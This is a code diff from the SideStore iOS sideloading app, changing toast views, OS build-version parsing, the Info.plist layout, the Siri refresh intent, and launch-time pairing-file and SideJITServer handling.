     override func show(in view: UIView, duration: TimeInterval)
     {
+        if opensErrorLog, #available(iOS 13.0, *), case let configuration = UIImage.SymbolConfiguration(font: self.textLabel.font),
+           let icon = UIImage(systemName: "chevron.right.circle", withConfiguration: configuration) {
+            let tintedIcon = icon.withTintColor(.white, renderingMode: .alwaysOriginal)
+            let moreIconImageView = UIImageView(image: tintedIcon)
+            moreIconImageView.translatesAutoresizingMaskIntoConstraints = false
+            self.addSubview(moreIconImageView)
+            NSLayoutConstraint.activate([
+                moreIconImageView.trailingAnchor.constraint(equalTo: self.trailingAnchor, constant: -self.layoutMargins.right),
+                moreIconImageView.centerYAnchor.constraint(equalTo: self.textLabel.centerYAnchor),
+                moreIconImageView.leadingAnchor.constraint(greaterThanOrEqualToSystemSpacingAfter: self.textLabel.trailingAnchor, multiplier: 1.0)
+            ])
+        }
         super.show(in: view, duration: duration)
         
         let announcement = (self.textLabel.text ?? "") + ". " + (self.detailTextLabel.text ?? "")
@@ -127,4 +138,10 @@ final class ToastView: RSTToastView
     {
         self.show(in: view, duration: self.preferredDuration)
     }
+
+    @objc
+    func showErrorLog() {
+        guard self.opensErrorLog else { return }
+        NotificationCenter.default.post(name: ToastView.openErrorLogNotification, object: self)
+    }
 }

AltStore/Extensions/ProcessInfo+SideStore.swift

@@ -0,0 +1,96 @@
+//
+//  ProcessInfo+SideStore.swift
+//  SideStore
+//
+//  Created by ny on 10/23/24.
+//  Copyright © 2024 SideStore. All rights reserved.
+//
+
+import Foundation
+
+fileprivate struct BuildVersion: Comparable {
+    let prefix: String
+    let numericPart: Int
+    let suffix: Character?
+    
+    init?(_ buildString: String) {
+        // Initialize indices
+        var index = buildString.startIndex
+        
+        // Extract prefix (letters before the numeric part)
+        while index < buildString.endIndex, !buildString[index].isNumber {
+            index = buildString.index(after: index)
+        }
+        guard index > buildString.startIndex else { return nil }
+        self.prefix = String(buildString[buildString.startIndex..<index])
+        
+        // Extract numeric part
+        let startOfNumeric = index
+        while index < buildString.endIndex, buildString[index].isNumber {
+            index = buildString.index(after: index)
+        }
+        guard let numericValue = Int(buildString[startOfNumeric..<index]) else { return nil }
+        self.numericPart = numericValue
+        
+        // Extract suffix (if any)
+        if index < buildString.endIndex {
+            self.suffix = buildString[index]
+        } else {
+            self.suffix = nil
+        }
+    }
+    
+    // Implement Comparable protocol
+    static func < (lhs: BuildVersion, rhs: BuildVersion) -> Bool {
+        // Compare prefixes
+        if lhs.prefix != rhs.prefix {
+            return lhs.prefix < rhs.prefix
+        }
+        // Compare numeric parts
+        if lhs.numericPart != rhs.numericPart {
+            return lhs.numericPart < rhs.numericPart
+        }
+        // Compare suffixes
+        switch (lhs.suffix, rhs.suffix) {
+        case let (l?, r?):
+            return l < r
+        case (nil, _?):
+            return true // nil is considered less than any character
+        case (_?, nil):
+            return false
+        default:
+            return false // Both are nil and equal
+        }
+    }
+    
+    static func == (lhs: BuildVersion, rhs: BuildVersion) -> Bool {
+        return lhs.prefix == rhs.prefix &&
+        lhs.numericPart == rhs.numericPart &&
+        lhs.suffix == rhs.suffix
+    }
+}
+
+extension ProcessInfo {
+    var shortVersion: String {
+        operatingSystemVersionString
+            .replacingOccurrences(of: "Version ", with: "")
+            .replacingOccurrences(of: "Build ", with: "")
+    }
+    
+    var operatingSystemBuild: String {
+        if let start = shortVersion.range(of: "(")?.upperBound,
+           let end = shortVersion.range(of: ")")?.lowerBound {
+            shortVersion[start..<end].replacingOccurrences(of: "Build ", with: "")
+        } else { "???" }
+    }
+    
+    var sparseRestorePatched: Bool {
+        if operatingSystemVersion < OperatingSystemVersion(majorVersion: 18, minorVersion: 1, patchVersion: 0) { false }
+        else if operatingSystemVersion > OperatingSystemVersion(majorVersion: 18, minorVersion: 1, patchVersion: 1) { true }
+        else if operatingSystemVersion >= OperatingSystemVersion(majorVersion: 18, minorVersion: 1, patchVersion: 0),
+                let currentBuild = BuildVersion(operatingSystemBuild),
+                let targetBuild  = BuildVersion("22B5054e") {
+            currentBuild >= targetBuild
+        } else { false }
+    }
+}

AltStore/Info.plist

@@ -1,212 +1,210 @@
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 <plist version="1.0">
-	<dict>
-		<key>ALTAppGroups</key>
-		<array>
-			<string>group.$(APP_GROUP_IDENTIFIER)</string>
-			<string>group.com.SideStore.SideStore</string>
-		</array>
-		<key>ALTDeviceID</key>
-		<string>00008101-000129D63698001E</string>
-		<key>ALTPairingFile</key>
-		<string>&lt;insert pairing file here&gt;</string>
-		<key>ALTServerID</key>
-		<string>1F7D5B55-79CE-4546-A029-D4DDC4AF3B6D</string>
-		<key>ALTAnisetteURL</key>
-		<string>https://ani.sidestore.io</string>
-		<key>CFBundleDevelopmentRegion</key>
-		<string>$(DEVELOPMENT_LANGUAGE)</string>
-		<key>CFBundleDocumentTypes</key>
-		<array>
-			<dict>
-				<key>CFBundleTypeIconFiles</key>
-				<array />
-				<key>CFBundleTypeName</key>
-				<string>iOS App</string>
-				<key>CFBundleTypeRole</key>
-				<string>Viewer</string>
-				<key>LSHandlerRank</key>
-				<string>Alternate</string>
-				<key>LSItemContentTypes</key>
-				<array>
-					<string>com.apple.itunes.ipa</string>
-				</array>
-			</dict>
-		</array>
-		<key>CFBundleExecutable</key>
-		<string>$(EXECUTABLE_NAME)</string>
-		<key>CFBundleIdentifier</key>
-		<string>$(PRODUCT_BUNDLE_IDENTIFIER)</string>
-		<key>CFBundleInfoDictionaryVersion</key>
-		<string>6.0</string>
-		<key>CFBundleName</key>
-		<string>$(PRODUCT_NAME)</string>
-		<key>CFBundlePackageType</key>
-		<string>APPL</string>
-		<key>CFBundleShortVersionString</key>
-		<string>$(MARKETING_VERSION)</string>
-		<key>CFBundleURLTypes</key>
-		<array>
-			<dict>
-				<key>CFBundleTypeRole</key>
-				<string>Editor</string>
-				<key>CFBundleURLName</key>
-				<string>AltStore General</string>
-				<key>CFBundleURLSchemes</key>
-				<array>
-					<string>altstore</string>
-					<string>sidestore</string>
-				</array>
-			</dict>
-			<dict>
-				<key>CFBundleTypeRole</key>
-				<string>Editor</string>
-				<key>CFBundleURLName</key>
-				<string>AltStore Backup</string>
-				<key>CFBundleURLSchemes</key>
-				<array>
-					<string>altstore-com.rileytestut.AltStore</string>
-					<string>sidestore-com.SideStore.SideStore</string>
-				</array>
-			</dict>
-		</array>
-		<key>CFBundleVersion</key>
-		<string>1</string>
-		<key>INIntentsSupported</key>
-		<array>
-			<string>RefreshAllIntent</string>
-			<string>ViewAppIntent</string>
-		</array>
-		<key>LSApplicationQueriesSchemes</key>
-		<array>
-			<string>altstore-com.rileytestut.AltStore</string>
-			<string>altstore-com.rileytestut.AltStore.Beta</string>
-			<string>altstore-com.rileytestut.Delta</string>
-			<string>altstore-com.rileytestut.Delta.Beta</string>
-			<string>altstore-com.rileytestut.Delta.Lite</string>
-			<string>altstore-com.rileytestut.Delta.Lite.Beta</string>
-			<string>altstore-com.rileytestut.Clip</string>
-			<string>altstore-com.rileytestut.Clip.Beta</string>
-		</array>
-		<key>LSRequiresIPhoneOS</key>
-		<true />
-		<key>LSSupportsOpeningDocumentsInPlace</key>
-		<true />
-		<key>NSAppTransportSecurity</key>
+<dict>
+	<key>ALTAnisetteURL</key>
+	<string>https://ani.sidestore.io</string>
+	<key>ALTAppGroups</key>
+	<array>
+		<string>group.$(APP_GROUP_IDENTIFIER)</string>
+		<string>group.com.SideStore.SideStore</string>
+	</array>
+	<key>ALTDeviceID</key>
+	<string>00008101-000129D63698001E</string>
+	<key>ALTPairingFile</key>
+	<string>&lt;insert pairing file here&gt;</string>
+	<key>ALTServerID</key>
+	<string>1F7D5B55-79CE-4546-A029-D4DDC4AF3B6D</string>
+	<key>CFBundleDevelopmentRegion</key>
+	<string>$(DEVELOPMENT_LANGUAGE)</string>
+	<key>CFBundleDocumentTypes</key>
+	<array>
 		<dict>
-			<key>NSAllowsArbitraryLoads</key>
-			<true />
-		</dict>
-		<key>NSAppleMusicUsageDescription</key>
-		<string>So that we can bypass the 3 app limit and disable revokes.</string>
-		<key>NSBonjourServices</key>
-		<array>
-			<string>_altserver._tcp</string>
-		</array>
-		<key>NSLocalNetworkUsageDescription</key>
-		<string>SideStore uses the local network to find and communicate with your device.</string>
-		<key>NSUserActivityTypes</key>
-		<array>
-			<string>RefreshAllIntent</string>
-			<string>ViewAppIntent</string>
-		</array>
-		<key>UIApplicationSceneManifest</key>
-		<dict>
-			<key>UIApplicationSupportsMultipleScenes</key>
-			<true />
-			<key>UISceneConfigurations</key>
-			<dict>
-				<key>UIWindowSceneSessionRoleApplication</key>
-				<array>
-					<dict>
-						<key>UILaunchStoryboardName</key>
-						<string>LaunchScreen</string>
-						<key>UISceneConfigurationName</key>
-						<string>Default Configuration</string>
-						<key>UISceneDelegateClassName</key>
-						<string>$(PRODUCT_MODULE_NAME).SceneDelegate</string>
-						<key>UISceneStoryboardFile</key>
-						<string>Main</string>
-					</dict>
-				</array>
-			</dict>
-		</dict>
-		<key>UIBackgroundModes</key>
-		<array>
-			<string>audio</string>
-			<string>fetch</string>
-			<string>remote-notification</string>
-		</array>
-		<key>UIFileSharingEnabled</key>
-		<true />
-		<key>UILaunchStoryboardName</key>
-		<string>LaunchScreen</string>
-		<key>UIMainStoryboardFile</key>
-		<string>Main</string>
-		<key>UIRequiredDeviceCapabilities</key>
-		<array>
-			<string>armv7</string>
-		</array>
-		<key>UIStatusBarTintParameters</key>
-		<dict>
-			<key>UINavigationBar</key>
-			<dict>
-				<key>Style</key>
-				<string>UIBarStyleDefault</string>
-				<key>Translucent</key>
-				<false />
-			</dict>
-		</dict>
-		<key>UISupportedInterfaceOrientations</key>
-		<array>
-			<string>UIInterfaceOrientationPortrait</string>
-		</array>
-		<key>UISupportedInterfaceOrientations~ipad</key>
-		<array>
-			<string>UIInterfaceOrientationPortrait</string>
-			<string>UIInterfaceOrientationPortraitUpsideDown</string>
-			<string>UIInterfaceOrientationLandscapeLeft</string>
-			<string>UIInterfaceOrientationLandscapeRight</string>
-		</array>
-		<key>UTImportedTypeDeclarations</key>
-		<array>
-			<dict>
-				<key>UTTypeConformsTo</key>
-				<array>
-					<string>public.data</string>
-				</array>
-				<key>UTTypeDescription</key>
-				<string>iOS App</string>
-				<key>UTTypeIconFiles</key>
-				<array />
-				<key>UTTypeIdentifier</key>
+			<key>CFBundleTypeIconFiles</key>
+			<array/>
+			<key>CFBundleTypeName</key>
+			<string>iOS App</string>
+			<key>CFBundleTypeRole</key>
+			<string>Viewer</string>
+			<key>LSHandlerRank</key>
+			<string>Alternate</string>
+			<key>LSItemContentTypes</key>
+			<array>
 				<string>com.apple.itunes.ipa</string>
-				<key>UTTypeTagSpecification</key>
-				<dict>
-					<key>public.filename-extension</key>
-					<string>ipa</string>
-				</dict>
-			</dict>
-			<dict>
-				<key>UTTypeConformsTo</key>
-				<array>
-					<string>com.apple.plist</string>
-				</array>
-				<key>UTTypeDescription</key>
-				<string>Mobile Device Pairing</string>
-				<key>UTTypeIconFiles</key>
-				<array />
-				<key>UTTypeIdentifier</key>
-				<string>org.sidestore.mobiledevicepairing</string>
-				<key>UTTypeTagSpecification</key>
-				<dict>
-					<key>public.filename-extension</key>
-					<array>
-						<string>mobiledevicepairing</string>
-					</array>
-				</dict>
-			</dict>
-		</array>
+			</array>
+		</dict>
+	</array>
+	<key>CFBundleExecutable</key>
+	<string>$(EXECUTABLE_NAME)</string>
+	<key>CFBundleIdentifier</key>
+	<string>$(PRODUCT_BUNDLE_IDENTIFIER)</string>
+	<key>CFBundleInfoDictionaryVersion</key>
+	<string>6.0</string>
+	<key>CFBundleName</key>
+	<string>$(PRODUCT_NAME)</string>
+	<key>CFBundlePackageType</key>
+	<string>APPL</string>
+	<key>CFBundleShortVersionString</key>
+	<string>$(MARKETING_VERSION)</string>
+	<key>CFBundleURLTypes</key>
+	<array>
+		<dict>
+			<key>CFBundleTypeRole</key>
+			<string>Editor</string>
+			<key>CFBundleURLName</key>
+			<string>AltStore General</string>
+			<key>CFBundleURLSchemes</key>
+			<array>
+				<string>altstore</string>
+				<string>sidestore</string>
+			</array>
+		</dict>
+		<dict>
+			<key>CFBundleTypeRole</key>
+			<string>Editor</string>
+			<key>CFBundleURLName</key>
+			<string>AltStore Backup</string>
+			<key>CFBundleURLSchemes</key>
+			<array>
+				<string>altstore-com.rileytestut.AltStore</string>
+				<string>sidestore-com.SideStore.SideStore</string>
+			</array>
+		</dict>
+	</array>
+	<key>CFBundleVersion</key>
+	<string>1</string>
+	<key>INIntentsSupported</key>
+	<array>
+		<string>RefreshAllIntent</string>
+		<string>ViewAppIntent</string>
+	</array>
+	<key>LSApplicationQueriesSchemes</key>
+	<array>
+		<string>altstore-com.rileytestut.AltStore</string>
+		<string>altstore-com.rileytestut.AltStore.Beta</string>
+		<string>altstore-com.rileytestut.Delta</string>
+		<string>altstore-com.rileytestut.Delta.Beta</string>
+		<string>altstore-com.rileytestut.Delta.Lite</string>
+		<string>altstore-com.rileytestut.Delta.Lite.Beta</string>
+		<string>altstore-com.rileytestut.Clip</string>
+		<string>altstore-com.rileytestut.Clip.Beta</string>
+	</array>
+	<key>LSRequiresIPhoneOS</key>
+	<true/>
+	<key>LSSupportsOpeningDocumentsInPlace</key>
+	<false/>
+	<key>NSAppTransportSecurity</key>
+	<dict>
+		<key>NSAllowsArbitraryLoads</key>
+		<true/>
 	</dict>
-</plist>
+	<key>NSBonjourServices</key>
+	<array>
+		<string>_altserver._tcp</string>
+	</array>
+	<key>NSLocalNetworkUsageDescription</key>
+	<string>SideStore uses the local network to find and communicate with your device.</string>
+	<key>NSUserActivityTypes</key>
+	<array>
+		<string>RefreshAllIntent</string>
+		<string>ViewAppIntent</string>
+	</array>
+	<key>UIApplicationSceneManifest</key>
+	<dict>
+		<key>UIApplicationSupportsMultipleScenes</key>
+		<true/>
+		<key>UISceneConfigurations</key>
+		<dict>
+			<key>UIWindowSceneSessionRoleApplication</key>
+			<array>
+				<dict>
+					<key>UILaunchStoryboardName</key>
+					<string>LaunchScreen</string>
+					<key>UISceneConfigurationName</key>
+					<string>Default Configuration</string>
+					<key>UISceneDelegateClassName</key>
+					<string>$(PRODUCT_MODULE_NAME).SceneDelegate</string>
+					<key>UISceneStoryboardFile</key>
+					<string>Main</string>
+				</dict>
+			</array>
+		</dict>
+	</dict>
+	<key>UIBackgroundModes</key>
+	<array>
+		<string>audio</string>
+		<string>fetch</string>
+		<string>remote-notification</string>
+	</array>
+	<key>UIFileSharingEnabled</key>
+	<true/>
+	<key>UILaunchStoryboardName</key>
+	<string>LaunchScreen</string>
+	<key>UIMainStoryboardFile</key>
+	<string>Main</string>
+	<key>UIRequiredDeviceCapabilities</key>
+	<array>
+		<string>armv7</string>
+	</array>
+	<key>UIStatusBarTintParameters</key>
+	<dict>
+		<key>UINavigationBar</key>
+		<dict>
+			<key>Style</key>
+			<string>UIBarStyleDefault</string>
+			<key>Translucent</key>
+			<false/>
+		</dict>
+	</dict>
+	<key>UISupportedInterfaceOrientations</key>
+	<array>
+		<string>UIInterfaceOrientationPortrait</string>
+	</array>
+	<key>UISupportedInterfaceOrientations~ipad</key>
+	<array>
+		<string>UIInterfaceOrientationPortrait</string>
+		<string>UIInterfaceOrientationPortraitUpsideDown</string>
+		<string>UIInterfaceOrientationLandscapeLeft</string>
+		<string>UIInterfaceOrientationLandscapeRight</string>
+	</array>
+	<key>UTImportedTypeDeclarations</key>
+	<array>
+		<dict>
+			<key>UTTypeConformsTo</key>
+			<array>
+				<string>public.data</string>
+			</array>
+			<key>UTTypeDescription</key>
+			<string>iOS App</string>
+			<key>UTTypeIconFiles</key>
+			<array/>
+			<key>UTTypeIdentifier</key>
+			<string>com.apple.itunes.ipa</string>
+			<key>UTTypeTagSpecification</key>
+			<dict>
+				<key>public.filename-extension</key>
+				<string>ipa</string>
+			</dict>
+		</dict>
+		<dict>
+			<key>UTTypeConformsTo</key>
+			<array>
+				<string>com.apple.plist</string>
+			</array>
+			<key>UTTypeDescription</key>
+			<string>Mobile Device Pairing</string>
+			<key>UTTypeIconFiles</key>
+			<array/>
+			<key>UTTypeIdentifier</key>
+			<string>org.sidestore.mobiledevicepairing</string>
+			<key>UTTypeTagSpecification</key>
+			<dict>
+				<key>public.filename-extension</key>
+				<array>
+					<string>mobiledevicepairing</string>
+				</array>
+			</dict>
+		</dict>
+	</array>
+</dict>
+</plist>

AltStore/Intents/IntentHandler.swift

@@ -8,6 +8,7 @@
 
 import Foundation
 
+import minimuxer
 import AltStoreCore
 
 @available(iOS 14, *)
@@ -39,8 +40,12 @@ final class IntentHandler: NSObject, RefreshAllIntentHandling
         
         // Give ourselves 9 extra seconds before starting handle() timeout timer.
         // 10 seconds or longer results in timeout regardless.
-        self.queue.asyncAfter(deadline: .now() + 9.0) {
-            self.finish(intent, response: RefreshAllIntentResponse(code: .ready, userActivity: nil))
+        self.queue.asyncAfter(deadline: .now() + 8.0) {
+            if minimuxer.ready() {
+                self.finish(intent, response: RefreshAllIntentResponse(code: .success, userActivity: nil))
+            } else {
+                self.finish(intent, response: RefreshAllIntentResponse(code: .failure, userActivity: nil))
+            }
         }
         
         if !DatabaseManager.shared.isStarted
@@ -52,12 +57,14 @@ final class IntentHandler: NSObject, RefreshAllIntentHandling
                 }
                 else
                 {
+                    self.finish(intent, response: RefreshAllIntentResponse(code: .ready, userActivity: nil))
                     self.refreshApps(intent: intent)
                 }
             }
         }
         else
         {
+            self.finish(intent, response: RefreshAllIntentResponse(code: .ready, userActivity: nil))
             self.refreshApps(intent: intent)
         }
     }
@@ -83,6 +90,11 @@ final class IntentHandler: NSObject, RefreshAllIntentHandling
                     // We took too long to finish and return the final result,
                     // so we'll now present a normal notification when finished.
                     operation.presentsFinishedNotification = true
+                    if minimuxer.ready() {
+                        self.finish(intent, response: RefreshAllIntentResponse(code: .success, userActivity: nil))
+                    } else {
+                        self.finish(intent, response: RefreshAllIntentResponse(code: .failure, userActivity: nil))
+                    }
                 }
                 
                 self.finish(intent, response: RefreshAllIntentResponse(code: .inProgress, userActivity: nil))
@@ -106,6 +118,9 @@ private extension IntentHandler
             {
                 // Queue response in case refreshing finishes after confirm() but before handle().
                 self.queuedResponses[intent] = response
+                DispatchQueue.main.async {
+                    UIApplication.shared.perform(#selector(NSXPCConnection.suspend))
+                }
             }
         }
     }
@@ -126,10 +141,12 @@ private extension IntentHandler
                     }
                     
                     self.finish(intent, response: RefreshAllIntentResponse(code: .success, userActivity: nil))
+                    UIApplication.shared.perform(#selector(NSXPCConnection.suspend))
                 }
-                catch RefreshError.noInstalledApps
+                catch ~RefreshErrorCode.noInstalledApps
                 {
                     self.finish(intent, response: RefreshAllIntentResponse(code: .success, userActivity: nil))
+                    UIApplication.shared.perform(#selector(NSXPCConnection.suspend))
                 }
                 catch let error as NSError
                 {

AltStore/LaunchViewController.swift

@@ -6,21 +6,24 @@
 //  Copyright © 2019 Riley Testut. All rights reserved.
 //
 
+import UIKit
+import Roxas
 import EmotionalDamage
 import minimuxer
-import Roxas
-import UIKit
 
 import AltStoreCore
 import UniformTypeIdentifiers
 
-final class LaunchViewController: RSTLaunchViewController, UIDocumentPickerDelegate {
+let pairingFileName = "ALTPairingFile.mobiledevicepairing"
+
+final class LaunchViewController: RSTLaunchViewController, UIDocumentPickerDelegate
+{
     private var didFinishLaunching = false
     
     private var destinationViewController: UIViewController!
     
     override var launchConditions: [RSTLaunchCondition] {
-        let isDatabaseStarted = RSTLaunchCondition(condition: { DatabaseManager.shared.isStarted }) { completionHandler in
+        let isDatabaseStarted = RSTLaunchCondition(condition: { DatabaseManager.shared.isStarted }) { (completionHandler) in
             DatabaseManager.shared.start(completionHandler: completionHandler)
         }
 
@@ -35,7 +38,8 @@ final class LaunchViewController: RSTLaunchViewController, UIDocumentPickerDeleg
         return self.children.first
     }
     
-    override func viewDidLoad() {
+    override func viewDidLoad()
+    {
         defer {
             // Create destinationViewController now so view controllers can register for receiving Notifications.
             self.destinationViewController = self.storyboard!.instantiateViewController(withIdentifier: "tabBarController") as! TabBarController
@@ -45,18 +49,94 @@ final class LaunchViewController: RSTLaunchViewController, UIDocumentPickerDeleg
     
     override func viewDidAppear(_ animated: Bool) {
         super.viewDidAppear(true)
-        #if !targetEnvironment(simulator)
-        start_em_proxy(bind_addr: Consts.Proxy.serverURL)
-
-        guard let pf = fetchPairingFile() else {
-            self.displayError("Device pairing file not found.")
-            return
+        if #available(iOS 17, *), !UserDefaults.standard.sidejitenable {
+            DispatchQueue.global().async {
+                self.isSideJITServerDetected() { result in
+                    DispatchQueue.main.async {
+                        switch result {
+                        case .success():
+                            let dialogMessage = UIAlertController(title: "SideJITServer Detected", message: "Would you like to enable SideJITServer", preferredStyle: .alert)
+                            
+                            // Create OK button with action handler
+                            let ok = UIAlertAction(title: "OK", style: .default, handler: { (action) -> Void in
+                                UserDefaults.standard.sidejitenable = true
+                            })
+                            
+                            let cancel = UIAlertAction(title: "Cancel", style: .cancel)
+                            //Add OK button to a dialog message
+                            dialogMessage.addAction(ok)
+                            dialogMessage.addAction(cancel)
+                            
+                            // Present Alert to
+                            self.present(dialogMessage, animated: true, completion: nil)
+                        case .failure(_):
+                            print("Cannot find sideJITServer")
+                        }
+                    }
+                }
+            }
         }
         
-        self.start_minimuxer_threads(pf)
+        if #available(iOS 17, *), UserDefaults.standard.sidejitenable {
+            DispatchQueue.global().async {
+                self.askfornetwork()
+            }
+            print("SideJITServer Enabled")
+        }
+        
+        
+        
+        #if !targetEnvironment(simulator)
+        start_em_proxy(bind_addr: Consts.Proxy.serverURL)
+        
+        guard let pf = fetchPairingFile() else {
+            displayError("Device pairing file not found.")
+            return
+        }
+        start_minimuxer_threads(pf)
         #endif
     }
     
+    func askfornetwork() {
+        let address = UserDefaults.standard.textInputSideJITServerurl ?? ""
+        
+        var SJSURL = address
+        
+        if (UserDefaults.standard.textInputSideJITServerurl ?? "").isEmpty {
+          SJSURL = "http://sidejitserver._http._tcp.local:8080"
+        }
+        
+        // Create a network operation at launch to Refresh SideJITServer
+        let url = URL(string: "\(SJSURL)/re/")!
+        let task = URLSession.shared.dataTask(with: url) { (data, response, error) in
+            print(data)
+        }
+        task.resume()
+    }
+    
+    func isSideJITServerDetected(completion: @escaping (Result<Void, Error>) -> Void) {
+        let address = UserDefaults.standard.textInputSideJITServerurl ?? ""
+        
+        var SJSURL = address
+        
+        if (UserDefaults.standard.textInputSideJITServerurl ?? "").isEmpty {
+          SJSURL = "http://sidejitserver._http._tcp.local:8080"
+        }
+        
+        // Create a network operation at launch to Refresh SideJITServer
+        let url = URL(string: SJSURL)!
+        let task = URLSession.shared.dataTask(with: url) { (data, response, error) in
+            if let error = error {
+                print("No SideJITServer on Network")
+                completion(.failure(error))
+                return
+            }
+            completion(.success(()))
+        }
+        task.resume()
+        return
+    }
+    
     func fetchPairingFile() -> String? {
         let filename = "ALTPairingFile.mobiledevicepairing"
         let fm = FileManager.default
@@ -69,36 +149,55 @@ final class LaunchViewController: RSTLaunchViewController, UIDocumentPickerDeleg
             fm.fileExists(atPath: appResourcePath.path),
             let data = fm.contents(atPath: appResourcePath.path),
             let contents = String(data: data, encoding: .utf8),
-            !contents.isEmpty
-        {
+            !contents.isEmpty,
+            !UserDefaults.standard.isPairingReset {
             print("Loaded ALTPairingFile from \(appResourcePath.path)")
             return contents
-        } else if let plistString = Bundle.main.object(forInfoDictionaryKey: "ALTPairingFile") as? String, !plistString.isEmpty, !plistString.contains("insert pairing file here") {
+        } else if let plistString = Bundle.main.object(forInfoDictionaryKey: "ALTPairingFile") as? String, !plistString.isEmpty, !plistString.contains("insert pairing file here"), !UserDefaults.standard.isPairingReset{
             print("Loaded ALTPairingFile from Info.plist")
             return plistString
         } else {
             // Show an alert explaining the pairing file
             // Create new Alert
-            let dialogMessage = UIAlertController(title: "Pairing File", message: "Select the pairing file for your device. For more information, go to https://wiki.sidestore.io/guides/install#pairing-process", preferredStyle: .alert)
+            let dialogMessage = UIAlertController(title: "Pairing File", message: "Select the pairing file or select \"Help\" for help.", preferredStyle: .alert)
             
             // Create OK button with action handler
-            let ok = UIAlertAction(title: "OK", style: .default, handler: { _ in
+            let ok = UIAlertAction(title: "OK", style: .default, handler: { (action) -> Void in
                 // Try to load it from a file picker
                 var types = UTType.types(tag: "plist", tagClass: UTTagClass.filenameExtension, conformingTo: nil)
                 types.append(contentsOf: UTType.types(tag: "mobiledevicepairing", tagClass: UTTagClass.filenameExtension, conformingTo: UTType.data))
                 types.append(.xml)
                 let documentPickerController = UIDocumentPickerViewController(forOpeningContentTypes: types)
-//                documentPickerController.shouldShowFileExtensions = true
+                documentPickerController.shouldShowFileExtensions = true
                 documentPickerController.delegate = self
                 self.present(documentPickerController, animated: true, completion: nil)
-            })
+                UserDefaults.standard.isPairingReset = false
+             })
             
-            // Add OK button to a dialog message
+            //Add "help" button to take user to wiki
+            let wikiOption = UIAlertAction(title: "Help", style: .default) { (action) in
+                let wikiURL: String = "https://docs.sidestore.io/docs/getting-started/pairing-file"
+                if let url = URL(string: wikiURL) {
+                    UIApplication.shared.open(url)
+                }
+                sleep(2)
+                exit(0)
+            }
+            
+            //Add buttons to dialog message
+            dialogMessage.addAction(wikiOption)
             dialogMessage.addAction(ok)
 
             // Present Alert to
             self.present(dialogMessage, animated: true, completion: nil)
 
+            let dialogMessage2 = UIAlertController(title: "Analytics", message: "This app contains anonymous analytics for research and project development. By continuing to use this app, you are consenting to this data collection", preferredStyle: .alert)
+
+            let ok2 = UIAlertAction(title: "OK", style: .default, handler: { (action) -> Void in})
+            
+            dialogMessage2.addAction(ok2)
+            self.present(dialogMessage2, animated: true, completion: nil)
+
             return nil
         }
     }
@@ -121,83 +220,87 @@ final class LaunchViewController: RSTLaunchViewController, UIDocumentPickerDeleg
             let data1 = try Data(contentsOf: urls[0])
             let pairing_string = String(bytes: data1, encoding: .utf8)
             if pairing_string == nil {
-                self.displayError("Unable to read pairing file")
+                displayError("Unable to read pairing file")
             }
             
             // Save to a file for next launch
-            let filename = "ALTPairingFile.mobiledevicepairing"
-            let fm = FileManager.default
-            let documentsPath = fm.documentsDirectory.appendingPathComponent("/\(filename)")
-            try pairing_string?.write(to: documentsPath, atomically: true, encoding: String.Encoding.utf8)
+            let pairingFile = FileManager.default.documentsDirectory.appendingPathComponent("\(pairingFileName)")
+            try pairing_string?.write(to: pairingFile, atomically: true, encoding: String.Encoding.utf8)
             
             // Start minimuxer now that we have a file
-            self.start_minimuxer_threads(pairing_string!)
-            
+            start_minimuxer_threads(pairing_string!)
         } catch {
-            self.displayError("Unable to read pairing file")
+            displayError("Unable to read pairing file")
         }
         
-        if isSecuredURL {
+        if (isSecuredURL) {
             url.stopAccessingSecurityScopedResource()
         }
         controller.dismiss(animated: true, completion: nil)
     }
     
     func documentPickerWasCancelled(_ controller: UIDocumentPickerViewController) {
-        self.displayError("Choosing a pairing file was cancelled. Please re-open the app and try again.")
+        displayError("Choosing a pairing file was cancelled. Please re-open the app and try again.")
     }
     
     func start_minimuxer_threads(_ pairing_file: String) {
-        set_usbmuxd_socket()
-        #if false // Retries
-        var res = start_minimuxer(pairing_file: pairing_file)
-        var attempts = 10
-        while attempts != 0, res != 0 {
-            print("start_minimuxer `res` != 0, retry #\(attempts)")
-            res = start_minimuxer(pairing_file: pairing_file)
-            attempts -= 1
+        target_minimuxer_address()
+        let documentsDirectory = FileManager.default.documentsDirectory.absoluteString
+        do {
+            try start(pairing_file, documentsDirectory)
+        } catch {
+            try! FileManager.default.removeItem(at: FileManager.default.documentsDirectory.appendingPathComponent("\(pairingFileName)"))
+            displayError("minimuxer failed to start, please restart SideStore. \((error as? LocalizedError)?.failureReason ?? "UNKNOWN ERROR!!!!!! REPORT TO GITHUB ISSUES!")")
         }
-        #else
-        let res = start_minimuxer(pairing_file: pairing_file)
-        #endif
-        if res != 0 {
-            self.displayError("minimuxer failed to start. Incorrect arguments were passed.")
+        if #available(iOS 17, *) {
+            // TODO: iOS 17 and above have a new JIT implementation that is completely broken in SideStore :(
+        }
+        else {
+            start_auto_mounter(documentsDirectory)
         }
-        auto_mount_dev_image()
     }
 }
 
-extension LaunchViewController {
-    override func handleLaunchError(_ error: Error) {
-        do {
+extension LaunchViewController
+{
+    override func handleLaunchError(_ error: Error)
+    {
+        do
+        {
             throw error
-        } catch let error as NSError {
+        }
+        catch let error as NSError
+        {
             let title = error.userInfo[NSLocalizedFailureErrorKey] as? String ?? NSLocalizedString("Unable to Launch SideStore", comment: "")
             
             let errorDescription: String
             
-            if #available(iOS 14.5, *) {
+            if #available(iOS 14.5, *)
+            {
                 let errorMessages = [error.debugDescription] + error.underlyingErrors.map { ($0 as NSError).debugDescription }
                 errorDescription = errorMessages.joined(separator: "\n\n")
-            } else {
+            }
+            else
+            {
                 errorDescription = error.debugDescription
             }
             
             let alertController = UIAlertController(title: title, message: errorDescription, preferredStyle: .alert)
-            alertController.addAction(UIAlertAction(title: NSLocalizedString("Retry", comment: ""), style: .default, handler: { _ in
+            alertController.addAction(UIAlertAction(title: NSLocalizedString("Retry", comment: ""), style: .default, handler: { (action) in
                 self.handleLaunchConditions()
             }))
             self.present(alertController, animated: true, completion: nil)
         }
     }
     
-    override func finishLaunching() {
+    override func finishLaunching()
+    {
         super.finishLaunching()
         
         guard !self.didFinishLaunching else { return }
         
         AppManager.shared.update()
-        AppManager.shared.updatePatronsIfNeeded()
+        AppManager.shared.updatePatronsIfNeeded()        
         PatreonAPI.shared.refreshPatreonAccount()
         
         // Add view controller as child (rather than presenting modally)
@@ -212,37 +315,6 @@ extension LaunchViewController {
